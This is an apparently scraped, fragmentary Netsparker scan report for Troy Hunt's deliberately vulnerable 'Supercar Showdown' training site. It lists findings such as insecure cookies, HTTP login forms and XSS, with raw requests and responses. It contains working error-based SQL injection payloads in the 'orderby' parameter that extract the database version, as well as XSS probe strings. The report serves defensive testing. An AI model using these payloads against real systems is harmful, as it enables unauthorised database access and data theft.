</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/SupercarLeaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 total, 1 confirmed
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact: This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take: 1. See the remedy for the solution. 2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy: Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation: To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT: 1 TOTAL
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.
Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1 http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.00.2000
Vulnerability Database: Result is based on 18.08.2014 vulnerability database content
Certainty
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 TOTAL, 1 CONFIRMED
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take:
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><l…
MEDIUM: 3 TOTAL
9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter	Type	Value
userId	POST	1
supercarId	POST	3
comments	POST	"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing, such as Internet Explorer.
Certainty
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept:
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments="--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter	Type	Value
nsextt	GET	"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing, such as Internet Explorer.
Certainty
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_2dilemma' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter	Type	Value
orderby	GET	(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_2dilemma' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter	Type	Value
orderby	GET	(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_2dilemma' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter	Type	Value
orderby	GET	(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_2dilemma' to data type int.]
